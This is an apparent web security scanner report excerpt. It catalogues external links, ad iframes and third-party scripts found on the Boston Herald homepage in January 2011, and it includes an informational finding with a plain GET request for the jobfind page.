<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128mankins_believes_pats_days_are_over/srvc=home&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="250" width="315" alt="Logan Mankins believes Patriots days are over"></a>
...[SNIP]...
<a href="/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=1"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/18e69eb546_stpDeLeo012811AC.jpg" alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=1">
...[SNIP]...
<a href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/89c5b31e64_stpRite012811.jpg" alt="ALL WRONG: Anthony Hopkins and Colin O&#x2019;Donoghue star in &#x2018;The Rite,&#x2019; an &#x2018;Exorcist&#x2019;-inspired thriller."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2">
...[SNIP]...
<a href="/blogs/sports/celtics/"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/b6181f7db3_DieselTEASE.jpg" alt="Paul Pierce and Shaquille O&rsquo;Neal will play tonight in Phoenix. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/business/general/view/20110128goldman_sachs_triples_salaries_for_5_top_executives/format=comments&srvc=home&position=recent">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128lawrence_officer_convicted_of_rape/format=comments&srvc=home&position=recent">
...[SNIP]...
<a href="/entertainment/arts_culture/view/2011012865-million_spider-man_leaves_broadway_hanging/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8df24f_Spidey_01292011.jpg" alt="WEB OF WOES: The highly expensive Broadway musical &lsquo;Spider-Man Turn: Off the Dark&rsquo; has been the victim of bad press, according to director Julie Taymor."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/arts_culture/view/2011012865-million_spider-man_leaves_broadway_hanging/format=comments&srvc=home&position=recent">
...[SNIP]...
<!--// AD CONTAINER //-->
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" alt="Bad Rabbits">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=6">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<!-- <div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/index.php/2011/01/28/the-holiday-radio-ratings-rundown/"><img src="http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=3065"><img src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/live-from-honolulu-logan-mankins-on-the-pats-i-dont-see-them-trying-to-keep-me/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/mankins-looking-up.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/"><img src="http://cache.heraldinteractive.com/blogs/news/lone_republican/wp-content/uploads/2011/01/deval-82709.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/"><img src="http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=3679"><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&amp;page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping&nbsp;Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/07.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/02.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/basketball/celtics/view/20110128shaquille_oneal_earns_fresh_shot_eyes_return_tonight_in_phoenix/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg" alt="WELL WITHIN REACH: Kevin Garnett tries to slap the ball away from the Trail Blazers&#x2019; LaMarcus Aldridge during last night&#x2019;s 88-78 Celtics victory in Portland." /></a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&amp;page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077">Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121">Ind. Stats</a>
...[SNIP]...
<a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in &#x2018;The Mechanic,&#x2019; a remake of the Charles Bronson film directed by Michael Winner." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/entertainment/television/general/view.bg?articleid=1312267&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/ed4fba_tyler_01272011.jpg" border="0"
width="207" height="181" caption="Talent show gives Steven Tyler collectibles a big boost" />
</a>
...[SNIP]...
<a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/track/inside_track/view.bg?articleid=1312555&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/5eb1a6_mitt_01282011.jpg" border="0"
width="207" height="181" caption="We Hear: Mitt Romney, David Letterman, Andrew Weisblum and more..." />
</a>
...[SNIP]...
<a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=also">
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>    
<a class="orange" href="http://www.homefind.com">Search Homes</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker&rsquo;s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

7.11. http://www.bostonherald.com/jobfind/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /jobfind/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
